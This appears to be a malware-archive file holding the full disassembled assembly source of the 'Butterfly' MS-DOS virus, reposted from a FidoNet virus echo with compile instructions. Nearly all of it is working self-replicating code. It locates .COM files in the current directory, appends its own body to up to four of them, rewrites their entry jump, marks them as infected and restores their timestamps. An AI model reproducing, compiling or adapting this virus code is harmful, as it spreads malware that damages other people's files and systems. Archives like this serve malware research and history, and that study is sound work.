MalwareSourceCode/MSDOS/V-Index/Virus.MSDOS.Unknown.vir61.asm
vxunderground 4b9382ddbc re-organize
push
2022-08-21 04:07:57 -05:00

219 lines
7.6 KiB
NASM
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 51 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:17
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : BUTTRFLY.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Hans Schotel, 2:283/718 (06 Nov 94 17:56)
;* To : Fred Lee
;* Subj : BUTTRFLY.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Hans.Schotel@f718.n283.z2.fidonet.org
Comment|
************************************************************************
Virus Name: Butterfly Virus
Effective Length: 302 bytes
Disassembled by Silent Death - 1993
Notes:
- Non-Resident .COM appender
- infects up to 4 files in the current directory
- infected files have 01h as the 4th byte
- ok virus to learn off of but a lot of wasteful code
To Compile: [Byte matchup!]
TASM /m File.asm
TLINK /t FILE.obj
************************************************************************|
.model tiny
.code
org 100h
start:
jmp virus
nop
nop
oldjmp db 0cdh ; int 20h
newjmp db 20h
db 90h ; nop
id db 1 ; infection marker
virus:
call delta ; get delta offset
delta:
pop bp
sub bp,10Bh ; adjust delta offset
mov di,100h ; move bytes to the start
lea si,[bp+oldjmp] ; original starting
mov cx,4 ; move four bytes
cld ; clear direction flag
rep movsb ; move the bytes
mov ah,1Ah ; set dta
lea dx,[bp+dta] ; set into heap
int 21h
mov byte ptr [bp+offset counter],0 ; reset counter
mov ah,4Eh ; find first asciiz file
lea si,[bp+dta+1eh] ; points to fname in dta
lea dx,[bp+fspec] ; files to find (*.COM)
push dx ; save file spec
jmp short findfiles
returntohost:
mov ah,1Ah ; set dta
mov dx,80h ; to original position
int 21h
xor ax,ax ; clear all registers
xor bx,bx ; no real need to
xor cx,cx
xor dx,dx
xor si,si
xor di,di
mov sp,0FFFEh ; adjust stack pointer
mov bp,100h ; return to here
push bp
xor bp,bp ; clear this
retn ; return to host
closeup:
or bx,bx ; is handle 0?
jz findnext ; yup so don't bother closing
mov ch,0 ; get attributes
mov cl,[bp+dta+15h] ; theres no point!
mov ax,5701h ; set files date/time
mov cx,word ptr [bp+dta+16h]; get original time
mov dx,word ptr [bp+dta+18h]; get original date
int 21h
mov ah,3Eh ; close file
int 21h
xor bx,bx ; delete handle
findnext:
mov ah,4Fh ; find next file
findfiles:
pop dx ; get filespec
push dx
mov cx,7 ; all attributes
xor bx,bx ; make sure no handle
int 21h
jnc infect ; jump if file found
jmp returntohost2 ; no files found then quit
vname db 0FFh
db 'Goddamn Butterflies' ; YA Know!
db 0FFh
infect:
mov dx,si ; dx => fname in dta
mov ax,3D02h ; open file read/write
int 21h
jc closeup ; if error close up, get another
mov bx,ax ; handle to bx
mov ah,3Fh ; read from file
mov cx,4 ; four bytes
lea dx,[bp+oldjmp] ; save here
int 21h
mov ax,word ptr [bp+dta+23h]; get end of filename
cmp ax,444Eh ; is file command.com?
je closeup ; yup so leave it
cmp [bp+id],1 ; is file infected?
je closeup ; yup so leave it
mov ax,word ptr [bp+dta+1ah]; get file size
cmp ax,121 ; is file smaller than 121?
jb closeup ; if it is leave it
mov ax,4202h ; file pointer to end
cwd
xor cx,cx
int 21h
cmp ax,64768 ; is file to big to infect
ja closeup ; if above then jump
mov [bp+data],ax ; save file size
lea dx,[bp+oldjmp] ; buffer to write from
mov cx,4 ; 4 bytes
mov ah,40h ; write oldjmp to end of file
int 21h
lea dx,[bp+virus] ; start of virus
mov cx,12Ah ; write virus (298) to end
mov ah,40h ; write to file
int 21h
mov ax,4200h ; file pointer to start
cwd
xor cx,cx
int 21h
mov ax,[bp+data] ; get the file size
inc ax ; increment the file size
mov word ptr [bp+newjmp],ax ; save the new jump
mov [bp+oldjmp],0E9h ; new jump
mov [bp+id],1 ; infection marker
lea dx,[bp+oldjmp] ; new jump
mov ah,40h ; write new start
mov cx,4 ; four bytes
int 21h
inc [bp+counter]
cmp [bp+counter],4 ; has 4 files been infected?
jae returntohost3 ; yup so return to host
jmp closeup ; close current file
returntohost2: ; This is a total waste!
mov di,100h ; start of file
cmp word ptr [di],20CDh ; are we the original
je returntohost3 ; yup
returntohost3:
jmp returntohost
fspec db '*.COM',0 ; files to find
dta db 43 dup (0) ; holds dta
counter db 0 ; holds file counter
data dw 0 ; holds new jump offset
end start
;-+- Concord/QWK O.O1 Beta-7
; + Origin: Data Fellows BBS (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/L Specify library search paths
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)